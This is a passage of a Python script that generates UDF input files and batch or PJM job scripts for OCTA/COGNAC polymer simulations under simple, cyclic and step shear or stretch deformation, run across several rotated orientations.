\"計算ターゲットの条件を設定\"\n\t\\end{def}\t\n\n\t\\\\begin{data}\n\tCalcConditions:{\"cognac112\",1}\n\tSimpleDeformation:{\n\t\t\"both\",\n\t\t\t{\n\t\t\t[1.0e-03,5.0e-4,1.0e-04,5.0e-05]\n\t\t\t3.00,\n\t\t\t1.0e-02\n\t\t\t}\n\t\t\t{\n\t\t\t[1.0e-03,5.0e-4,1.0e-04,5.0e-05]\n\t\t\t2.0,\n\t\t\t1.0e-02\n\t\t\t}\n\t\t\t{\n\t\t\t[1.0e-03,5.0e-4,1.0e-04,5.0e-05]\n\t\t\t3.00,\n\t\t\t1.0e-02\n\t\t\t}\n\t\t}\n\tCycleDeformation:{\n\t\t\"CyclicShear\",\n\t\t\t{\n\t\t\t\t[\n\t\t\t\t\t{2.0,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.0e-03,1.0e-04]\n\t\t\t\t\t1.0e-02\n\t\t\t\t\t}\n\t\t\t\t\t{3.0,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.0e-03,1.00e-04,1.00e-05]\n\t\t\t\t\t1.00e-02\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t\t{\n\t\t\t\t[\n\t\t\t\t\t{2.00,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.0e-03,1.00e-04]\n\t\t\t\t\t1.00e-02\n\t\t\t\t\t}\n\t\t\t\t\t{3.00,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.00e-03,1.00e-04,1.00e-05]\n\t\t\t\t\t1.00e-02\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\tStepDeformation:{\n\t\t\"StepStretch\",\n\t\t\t{\n\t\t\t\t{\n\t\t\t\t{1.50,5.0e-02,200}\n\t\t\t\t[{100000,500}{100000,100}]\n\t\t\t\t[{3,1000000,500}]\n\t\t\t\t}\n\t\t\t}\n\t\t\t{\n\t\t\t\t{\n\t\t\t\t{1.00,0.10,200}\n\t\t\t\t[{100000,500}{100000,100}]\n\t\t\t\t[{3,1000000,500}]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\\end{data}\n\t'''\n\t###\n\twith codecs.open('../deform_condition.udf', 'w', 'utf_8') as f:\n\t\tf.write(contents)\n\treturn\n\n# Read udf and setup initial conditions\ndef read_and_set():\n\tdic={'y':True,'yes':True,'q':False,'quit':False}\n\twhile True:\n\t\t# read udf\n\t\tread_condition()\n\t\t# select\n\t\tinit_calc()\n\t\tprint('Change UDF: type [r]eload')\n\t\tprint('Quit input process: type [q]uit')\n\t\tinp = input('Condition is OK ==> [y]es >> ').lower()\n\t\tif inp in dic:\n\t\t\tinp = dic[inp]\n\t\t\tbreak\n\t\tprint('##### \\nRead Condition UDF again \\n#####\\n\\n')\n\tif inp:\n\t\treturn\n\telse:\n\t\tsys.exit(\"##### \\nQuit !!\")\n\n# Read condition udf\ndef read_condition():\n\tu = UDFManager(var.deform_udf)\n\tu.jump(-1)\n\t# 使用するCognacのバージョン\n\tvar.ver_Cognac = u.get('CalcConditions.Cognac_ver')\n\t# 計算に使用するコア数\n\tvar.core = u.get('CalcConditions.Cores')\n\t# Simple Deformation\n\tvar.simple_def_mode = u.get('SimpleDeformation.DeformMode').lower()\n\tif var.simple_def_mode == 'stretch':\n\t\tvar.sim_rate_list = u.get('SimpleDeformation.Stretch.DeformRate[]')\n\t\tvar.sim_deform_max = u.get('SimpleDeformation.Stretch.MaxDeformation')\n\t\tvar.sim_resolution = u.get('SimpleDeformation.Stretch.Resolution')\n\t\tvar.sim_deform = var.simple_def_mode\n\telif var.simple_def_mode == 'shear':\n\t\tvar.sim_rate_list = u.get('SimpleDeformation.Shear.DeformRate[]')\n\t\tvar.sim_deform_max = u.get('SimpleDeformation.Shear.MaxDeformation')\n\t\tvar.sim_resolution = u.get('SimpleDeformation.Shear.Resolution')\n\t\tvar.sim_deform = var.simple_def_mode\n\telif var.simple_def_mode == 'both':\n\t\tvar.sim_rate_list = u.get('SimpleDeformation.both.DeformRate[]')\n\t\tvar.sim_deform_max = u.get('SimpleDeformation.both.MaxDeformation')\n\t\tvar.sim_resolution = u.get('SimpleDeformation.both.Resolution')\n\t# Cyclic Deformation\n\ttmp = []\n\tvar.cyclic_deform = u.get('CycleDeformation.CyclicDeform')\n\tif var.cyclic_deform == 'CyclicStretch':\n\t\ttmp = u.get('CycleDeformation.CyclicStretch.StretchConditions[]')\n\telif var.cyclic_deform == 'CyclicShear':\n\t\ttmp = u.get('CycleDeformation.CyclicShear.ShearConditions[]')\n\tfor data in tmp:\n\t\tmax_strain, repeat, ratelist, resolution = data\n\t\tvar.cyc_deform_cond_dic[max_strain] = [repeat, ratelist, resolution]\n\t\t# var.cyc_deform_max_list.append(data[0])\n\t\t# var.cyc_repeat.append(data[1])\n\t\t# var.cyc_ratelist.append(data[2])\n\t\t# var.cyc_resolution.append(data[3])\n\t# Step Deformation\n\tvar.step_deform = u.get('StepDeformation.StepDeform')\n\tif var.step_deform == 'StepShear':\n\t\t[var.step_deform_max, var.step_rate, var.step_steps] = u.get('StepDeformation.StepShear.ShearConditions.Deformation')\n\t\tdeform_time = var.step_deform_max/var.step_rate\n\t\t#\n\t\tvar.step_relaxation = u.get('StepDeformation.StepShear.ShearConditions.Relaxation[]')\n\t\tvar.step_repeat = u.get('StepDeformation.StepShear.ShearConditions.Repeat[]')[0]\n\telif var.step_deform == 'StepStretch':\n\t\t[var.step_deform_max, var.step_rate, var.step_steps] = u.get('StepDeformation.StepStretch.StretchConditions.Deformation')\n\t\tif var.step_deform_max == 1.0:\n\t\t\tsys.exit('\\nStep Stretch Condition is not proper !!\\nMax Deformation should be greater than 1.0 !')\n\t\telse:\n\t\t\tdeform_time = abs(var.step_deform_max - 1)/var.step_rate\n\t\t#\n\t\tvar.step_relaxation = u.get('StepDeformation.StepStretch.StretchConditions.Relaxation[]')\n\t\tvar.step_repeat = u.get('StepDeformation.StepShear.ShearConditions.Repeat[]')[0]\n\t#\n\tif var.step_deform != 'none':\n\t\tdt = min(var.sim_time_div, deform_time/var.step_steps)\t# dt の暫定値を決定\n\t\ttotal_steps = round(deform_time/dt)\n\t\tinterval = max(1, round(total_steps/var.step_steps))\t# 整数値の interval を決定\n\t\tdt = round(deform_time/var.step_steps/interval, 4)\t\t# 小数点4桁で丸めたdtを決定\n\t\tvar.step_deform_time = [dt, total_steps, interval]\n\t#\n\tif var.simple_def_mode == 'none' and var.cyclic_deform == 'none' and var.step_deform == 'none':\n\t\tsys.exit('No proper condition is selected.\\nBye!')\n\treturn\n# \ndef init_calc():\n\ttext = \"################################################\" + \"\\n\"\n\ttext += \"Cores used for simulation\\t\\t\" + str(var.core ) + \"\\n\"\n\ttext += \"################################################\" + \"\\n\"\n\tif var.simple_def_mode != 'none':\n\t\ttext += \"Deform mode:\\t\\t\\t\\t\" + str(var.simple_def_mode) + \"\\n\"\n\t\ttext += \"Deform Rate:\\t\\t\" + ', '.join([f\"{x:.1e}\" for x in var.sim_rate_list]) + \"\\n\"\n\t\ttext += \"Maximum Strain:\\t\\t\\t\\t\" + str(var.sim_deform_max) + \"\\n\"\n\t\ttext += \"Resolution:\\t\\t\\t\\t\" + str(round(var.sim_resolution,4)) + \"\\n\"\n\t\ttext += \"################################################\" + \"\\n\"\n\tif var.cyclic_deform != 'none':\n\t\ttext += \"Cyclic Deform mode:\\t\\t\\t\" + str(var.cyclic_deform) + \"\\n\"\n\t\tcount = 0\n\t\tfor key in var.cyc_deform_cond_dic:\n\t\t\ttext += f'Cyclic condition #{count}\\n'\n\t\t\ttext += f\"\\tMaximum Strain:\\t\\t\\t{key:.1f}\\n\"\n\t\t\ttext += f\"\\tRepeat:\\t\\t\\t\\t{var.cyc_deform_cond_dic[key][0]}\\n\"\n\t\t\ttext += \"\\tCyclic Deform Rate:\\t\" + ', '.join([f\"{x:.1e}\" for x in var.cyc_deform_cond_dic[key][1]]) + \"\\n\"\n\t\t\ttext += \"\\tResolution:\\t\\t\\t\" + str(round(var.cyc_deform_cond_dic[key][2], 4)) + \"\\n\"\n\t\ttext += \"################################################\" + \"\\n\"\n\tif var.step_deform != 'none':\n\t\ttext += f\"Step Deform mode:\\t\\t\\t{var.step_deform:}\\n\"\n\t\ttext += f\"Step Strain:\\t\\t\\t\\t{var.step_deform_max:.1f}\\n\"\n\t\ttext += f\"Deformation rate:\\t\\t\\t{var.step_rate:.1e}\\n\"\n\t\ttext += f\"Deformation steps:\\t\\t\\t{var.step_steps:}\\n\"\n\t\ttext += f\"Simulation time:\\t\\t{var.step_deform_time:}\\n\"\n\t\ttext += \"#\\n\"\n\t\tfor i, data in enumerate(var.step_relaxation):\n\t\t\ttext += f\"Relaxation-{i:}\\n\"\n\t\t\ttext += f\"\\tRelaxation Time:\\t\\t{data[0]:.1e}\\n\"\n\t\t\ttext += f\"\\tCalc. steps:\\t\\t\\t{data[1]:}\\n\"\n\t\ttext += \"#\\n\"\n\t\ttext += f'Repeat:\\t\\t\\t\\t\\t{var.step_repeat[0]:}\\n'\n\t\ttext += f'Relaxation steps:\\t\\t\\t{var.step_repeat[1]:.1e}\\n'\n\t\ttext += f'Calc. Steps:\\t\\t\\t\\t{var.step_repeat[2]:}\\n'\n\t\ttext += \"################################################\" + \"\\n\"\n\tprint(text)\n\treturn\n\n#######################################\n#\ndef setup():\n\tprint(\"\\n\\nSetting UP progress !!\\n\")\n\tif var.simple_def_mode != 'none':\n\t\tsetup_simple_deform()\n\tif var.cyclic_deform != 'none':\n\t\tsetup_cyclic_deform()\n\tif var.step_deform != 'none':\n\t\tsetup_step_deform()\n\treturn\n\n#####\n# 単純変形の設定\ndef setup_simple_deform():\n\tif var.simple_def_mode == 'both':\n\t\tfor var.sim_deform in ['shear', 'stretch']:\n\t\t\tset_simple_eachrate()\n\telse:\n\t\tset_simple_eachrate()\n\treturn\n\n\ndef set_simple_eachrate():\n\tvar.sim_basedir = f\"{var.sim_deform:}_calculation_read_{var.read_udf.split('.')[0]:}_until_{var.sim_deform_max:}\"\n\tif os.path.exists(var.sim_basedir):\n\t\tprint(\"Use existing dir of \", var.sim_basedir)\n\telse:\n\t\tprint(\"Make new dir of \", var.sim_basedir)\n\t\tos.makedirs(var.sim_basedir)\n\n\tc_dir = os.getcwd().split('\\\\')[-1]\n\tvar.title_base = str(c_dir.split('_', 2)[-1]) + f\"_{var.sim_deform:}_calculation_until_{var.sim_deform_max:}_\"\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc_all.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc_all.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\t#\n\t\ttask2 = 'sh eval_all.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\toption = f'simple_deform.py -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} -s \\n'\n\t\tmake_batch_series([f'rate_{rate:4.0e}' for rate in var.sim_rate_list], var.sim_basedir, task2, filename2, option)\n\tmake_batch_series([f'rate_{rate:4.0e}' for rate in var.sim_rate_list], var.sim_basedir, task, filename,'')\n\n\tfor var.sim_rate in var.sim_rate_list:\n\t\tvar.sim_ratedir = os.path.join(var.sim_basedir, f\"rate_{var.sim_rate:4.0e}\")\n\t\t#\n\t\tif os.path.exists(var.sim_ratedir):\n\t\t\tprint(\"Use existing dir of \", var.sim_ratedir)\n\t\telse:\n\t\t\tprint(\"Make new dir of \", var.sim_ratedir)\n\t\t\tos.makedirs(var.sim_ratedir)\n\t\t#\n\t\tset_rotation_simple()\n\treturn\n\ndef set_rotation_simple():\n\t# 変形方法に応じて回転方向を設定\n\tif var.sim_deform == 'shear':\n\t\tvar.step_rotate = ['base', 'x', 'y', 'z', 'yx', 'zx']\n\telif var.sim_deform == 'stretch':\n\t\tvar.step_rotate = ['base', 'x', 'y']\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'calc.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\t\toption = f'evaluate_simple_deform -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} -a \\n'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'pjsub calc.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\toption = ''\n\t\t#\n\t\ttask2 = 'sh eval.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\toption2 = f'simple_deform.py -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} -a \\n'\n\t\tmake_batch_series(['rotate_' + dir for dir in var.step_rotate], var.sim_ratedir, task2, filename2, option2)\n\tmake_batch_series(['rotate_' + dir for dir in var.step_rotate], var.sim_ratedir, task, filename, option)\n\n\tfor rotate in var.step_rotate:\n\t\tset_rotate_dir_sim(rotate)\n\t\tset_udf_batch_sim()\n\treturn\n\ndef set_rotate_dir_sim(rotate):\n\ttmp_dir = f'rotate_{rotate}'\n\tvar.title_name = var.title_base + f\"rate_{var.sim_rate:4.0e}\" + f'_rotate_{rotate}'\n\tvar.sim_dirlist.append(tmp_dir)\n\tvar.calc_dir = os.path.join(var.sim_ratedir, tmp_dir)\n\tif os.path.exists(var.calc_dir):\n\t\tprint(\"Use existing dir of \", var.calc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.calc_dir)\n\t\tos.makedirs(var.calc_dir)\n\n\tvar.base_udf = os.path.join(var.calc_dir, 'base.udf')\n\tu = UDFManager(var.read_udf)\n\tu.jump(1)\n\tu.eraseRecord(record_pos=0, record_num=u.totalRecord()-1)\n\tif rotate != 'base':\n\t\trotate_position(u, rotate)\n\tu.write(var.base_udf)\n\treturn\n\n# ファイル名を設定し、バッチファイルを作成\ndef set_udf_batch_sim():\n\t# UDFファイル名を設定\n\tuin = f'rate_{var.sim_rate:4.0e}_uin.udf'\n\t# プラットフォームに応じてバッチファイルを設定\n\tif platform.system() == \"Windows\":\n\t\tmake_title(var.title_name)\n\t\tvar.batch = \"#!/bin/bash\\n\"\n\t\ttarget_bat = 'calc.bat'\n\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uin.replace(\"uin\", \"out\") + ' -n ' + str(var.core) +' \\n'\n\t\tvar.batch += f'evaluate_simple_deform -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} \\n'\n\telif platform.system() == \"Linux\":\n\t\ttarget_bat = 'calc.sh'\n\t\tvar.batch = '#PJM -L \"node=1\"\\n'\n\t\tvar.batch += '#PJM -L \"rscgrp=small\"\\n'\n\t\tvar.batch += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\tvar.batch += '#PJM -g hp220245\\n'\n\t\tvar.batch += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\tvar.batch += '#PJM -S\\n'\n\t\tvar.batch += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\tvar.batch += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\tvar.batch += '${COGNAC} -I ' + uin + ' -O' + uin.replace(\"uin\", \"out\") + ' -n 48 \\n'\n\t\t#\n\t\teval = '#!/bin/sh\\n'\n\t\teval += f'simple_deform.py -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} \\n'\n\t\twrite_batchfile(var.calc_dir, 'eval.sh', eval)\n\twrite_batchfile(var.calc_dir, target_bat, var.batch)\n\n\tudf_in = os.path.join(var.calc_dir, uin)\n\tmake_simpledeform_udf(udf_in)\n\treturn\n\n#-----\ndef make_simpledeform_udf(udf_in):\n\tif var.sim_deform == 'stretch':\n\t\tdeform_time = abs(var.sim_deform_max - 1)/var.sim_rate\n\telif var.sim_deform == 'shear':\n\t\tdeform_time = var.sim_deform_max/var.sim_rate\n\t#\n\ttime_total = round(deform_time/var.sim_time_div)\n\ttime_1_step = round(var.sim_resolution/var.sim_time_div/var.sim_rate)\n\t#\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.sim_time_div,\tp + 'Time.delta_T')\n\tu.put(time_total,\tp + 'Time.Total_Steps')\n\tu.put(time_1_step,\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\n\t# Deformation\n\tif var.sim_deform == 'stretch':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Cell_Deformation', \t\tp + 'Method')\n\t\tu.put('Simple_Elongation', \t\tp + 'Cell_Deformation.Method')\n\t\tu.put('Initial_Strain_Rate', \tp + 'Cell_Deformation.Simple_Elongation.Input_Method')\n\t\tif var.sim_deform_max < 1.:\n\t\t\tvar.sim_rate = -1*var.sim_rate\n\t\tu.put(var.sim_rate,\t \t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Initial_Strain_Rate.Rate')\n\t\tu.put(0.5, \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Poisson_Ratio')\n\t\tu.put('z', \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Axis')\n\t\tu.put(1, \t\t\t\t\t\tp + 'Cell_Deformation.Interval_of_Deform')\n\t\tu.put(0, \t\t\t\t\t\tp + 'Cell_Deformation.Deform_Atom')\n\telif var.sim_deform == 'shear':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Lees_Edwards', \tp + 'Method')\n\t\tu.put('Steady', \t\tp + 'Lees_Edwards.Method')\n\t\tu.put(var.sim_rate, \t\t\tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put(['', -1], p)\n\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put(['', -1, 1, 1], \tp + 'Restart')\n\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n#######\n# 繰り返し変形の設定\ndef setup_cyclic_deform():\n\tset_cyclic_basedir()\n\tset_each_cycle()\n\treturn\n\ndef set_cyclic_basedir():\n\tvar.cyc_dir = var.cyclic_deform + '_read_' + var.read_udf.split('.')[0]\n\tif os.path.exists(var.cyc_dir):\n\t\tprint(\"Use existing dir of \", var.cyc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.cyc_dir)\n\t\tos.makedirs(var.cyc_dir)\n\treturn\n#\ndef set_each_cycle():\n\tfor cyc_def_max in var.cyc_deform_cond_dic:\n\t\tfor cyc_rate in var.cyc_deform_cond_dic[cyc_def_max][1]:\n\t\t\tcond_dir = 'Deform_until_' + str(cyc_def_max).replace('.', '_') + \"_rate_\" + f\"{cyc_rate:.1e}\".replace('.', '_')\n\t\t\tvar.cyc_dirlist.append(cond_dir)\n\t\t\tmiddle_dir = os.path.join(var.cyc_dir, cond_dir)\n\t\t\tif os.path.exists(middle_dir):\n\t\t\t\tprint(\"Use existing dir of \", middle_dir)\n\t\t\telse:\n\t\t\t\tprint(\"Make new dir of \", middle_dir)\n\t\t\t\tos.makedirs(middle_dir)\n\t\t\tset_cyclic_rotation(middle_dir, cyc_def_max, cyc_rate)\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc_all.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc_all.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\t#\n\t\ttask2 = 'sh eval_all.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\tmake_batch_series(var.cyc_dirlist, var.cyc_dir, task2, filename2,'')\n\tmake_batch_series(var.cyc_dirlist, var.cyc_dir, task, filename,'')\n\treturn\n\ndef set_cyclic_rotation(middle_dir, cyc_def_max, cyc_rate):\n\tif var.cyclic_deform == 'CyclicShear':\n\t\tvar.cyc_rotate = ['base', 'x', 'y', 'z', 'yx', 'zx']\n\t\tdeform = 'shear'\n\telif var.cyclic_deform == 'CyclicStretch':\n\t\tvar.cyc_rotate = ['base', 'x', 'y']\n\t\tdeform = 'stretch'\n\tfor rotate in var.cyc_rotate:\n\t\tset_cyc_rotate_dir(middle_dir, rotate, cyc_def_max, cyc_rate)\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\t\toption = f'evaluate_cyclic_deform -f {str(var.func):} -n {str(var.nu):} -m {deform:} -a \\n'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\toption = ''\n\t\t# 評価用のバッチを作成\n\t\ttask2 = 'sh eval.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\toption2 = f'cyclic_deform.py -f {str(var.func):} -n {str(var.nu):} -m {deform:} -a \\n'\n\t\tmake_batch_series(['rotate_' + dir for dir in var.cyc_rotate], middle_dir, task2, filename2, option2)\n\tmake_batch_series(['rotate_' + dir for dir in var.cyc_rotate], middle_dir, task, filename, option)\n\treturn\n\ndef set_cyc_rotate_dir(middle_dir, rotate, cyc_def_max, cyc_rate):\n\ttmp_dir = f'rotate_{rotate}'\n\tvar.calc_dir = os.path.join(middle_dir, tmp_dir)\n\tif os.path.exists(var.calc_dir):\n\t\tprint(\"Use existing dir of \", var.calc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.calc_dir)\n\t\tos.makedirs(var.calc_dir)\n\tvar.base_udf = os.path.join(var.calc_dir, 'base.udf')\n\tu = UDFManager(var.read_udf)\n\tu.jump(1)\n\tu.eraseRecord(record_pos=0, record_num=u.totalRecord()-1)\n\tif rotate != 'base':\n\t\trotate_position(u, rotate)\n\tu.write(var.base_udf)\n\n\tmake_cycle_batch(cyc_def_max, cyc_rate, rotate)\n\n\treturn\n\n# ファイル名を設定し、バッチファイルを作成\ndef make_cycle_batch(cyc_def_max, cyc_rate, rotate):\n\trepeatcount = ''\n\tcalc_all = \"#!/bin/bash\\n\"\n\tjobname = 'name' + str(uuid.uuid4())\n\tvar.batch = \"#!/bin/bash\\n\"\n\tfor var.cyc_count in range(var.cyc_deform_cond_dic[cyc_def_max][0]):\n\t\tvar.cyc_resol = var.cyc_deform_cond_dic[cyc_def_max][2]\n\t\tcalc_all = make_cycle(cyc_def_max, cyc_rate, rotate, calc_all, jobname)\n\t\trepeatcount += str(var.cyc_count) + ' '\n\t\tif platform.system() == \"Windows\":\n\t\t\tif var.cyclic_deform == 'CyclicStretch':\n\t\t\t\tvar.batch += 'evaluate_cyclic_deform -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m stretch\\n'\n\t\t\telif var.cyclic_deform == 'CyclicShear':\n\t\t\t\tvar.batch += 'evaluate_cyclic_deform -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m shear\\n'\n\t\t\t\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, 'calc.bat', var.batch)\n\t#\n\tif platform.system() == \"Linux\":\n\t\tevaluate = '#!/bin/sh\\n'\n\t\tevaluate += 'cyclic_deform.py -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m shear\\n'\n\t\twrite_batchfile(var.calc_dir, 'eval.sh', evaluate)\n\t\twrite_batchfile(var.calc_dir, 'calc.sh', calc_all)\n\n\treturn\n#\ndef make_cycle(cyc_def_max, cyc_rate, rotate, calc_all, jobname):\n\tfor var.cyc_direction in ['_Forward', '_Backward']:\n\t\t# UDFファイル名を設定\n\t\tuin = 'No_' +str(var.cyc_count) + var.cyc_direction + \"_uin.udf\"\n\t\tuout = uin.replace(\"uin\", \"out\")\n\t\tif platform.system() == \"Windows\":\n\t\t\tmake_title(var.title_name + \"_Calculating_Cycle_until_\" + str(cyc_def_max).replace('.', '_') + \"_rate_\" + f\"{cyc_rate:.1e}\".replace('.','_') + '_No' + str(var.cyc_count) + var.cyc_direction)\n\t\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\t\tcalc_sh += '#PJM -S\\n'\n\t\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, 'No_' + str(var.cyc_count) + var.cyc_direction + \".sh\", calc_sh)\n\t\t\t#\n\t\t\tcalc_all += f'pjsub --step --sparam \"jnam={jobname:}\" No_{var.cyc_count:}{var.cyc_direction:}.sh\\n'\n\t\tudf_in = os.path.join(var.calc_dir, uin)\n\t\tif var.cyc_count == 0 and var.cyc_direction == '_Forward':\n\t\t\tvar.cyc_readudf = 'base.udf'\n\t\tmod_cycle_udf(cyc_def_max, cyc_rate, udf_in)\n\t\tvar.cyc_readudf = uout\n\treturn calc_all\n\n#-----\ndef mod_cycle_udf(cyc_def_max, cyc_rate, udf_in):\n\tif var.cyclic_deform == 'CyclicStretch':\n\t\tdeform_time = (cyc_def_max - 1)/cyc_rate\n\t\tspeed = cyc_rate*var.system_size\n\telif var.cyclic_deform == 'CyclicShear':\n\t\tdeform_time = cyc_def_max/cyc_rate\n\t#\n\ttime_total = round(deform_time/var.sim_time_div)\n\ttime_1_step = round(var.cyc_resol/var.sim_time_div/cyc_rate)\n\t#\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.sim_time_div,\tp + 'Time.delta_T')\n\tu.put(time_total,\tp + 'Time.Total_Steps')\n\tu.put(time_1_step,\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\t# Deformation\n\tif var.cyclic_deform == 'CyclicStretch':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Cell_Deformation', \tp + 'Method')\n\t\tu.put('Simple_Elongation', \tp + 'Cell_Deformation.Method')\n\t\tu.put('Deformation_Speed', \tp + 'Cell_Deformation.Simple_Elongation.Input_Method')\n\t\tif var.cyc_direction == '_Forward':\n\t\t\tu.put(speed, p + 'Cell_Deformation.Simple_Elongation.Deformation_Speed.Speed')\n\t\telse:\n\t\t\tu.put(-1.*speed, p + 'Cell_Deformation.Simple_Elongation.Deformation_Speed.Speed')\n\t\tu.put(0.5, \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Poisson_Ratio')\n\t\tu.put('z', \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Axis')\n\t\tu.put(1, \t\t\t\t\t\tp + 'Cell_Deformation.Interval_of_Deform')\n\t\tu.put(0, \t\t\t\t\t\tp + 'Cell_Deformation.Deform_Atom')\n\telif var.cyclic_deform == 'CyclicShear':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Lees_Edwards', \tp + 'Method')\n\t\tu.put('Steady', \t\tp + 'Lees_Edwards.Method')\n\t\tif var.cyc_direction == '_Forward':\n\t\t\tu.put(cyc_rate, \t\tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t\telse:\n\t\t\tu.put(-1.*cyc_rate, \tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put(['', -1], p)\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put([var.cyc_readudf, -1, 1, 1], \tp + 'Restart')\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n\n\n#####\n#\ndef setup_step_deform():\n\t# 計算用のディレクトリーを作成\n\tset_step_basedir()\n\t# \n\tset_rotation_step()\n\t\n\treturn\n\t\n# \ndef set_step_basedir():\n\tvar.step_dir = f'{var.step_deform:}_until_' + f'{var.step_deform_max:.1f}'.replace('.','_') + '_rate_' + f'{var.step_rate:.1e}'.replace('.', '_') + 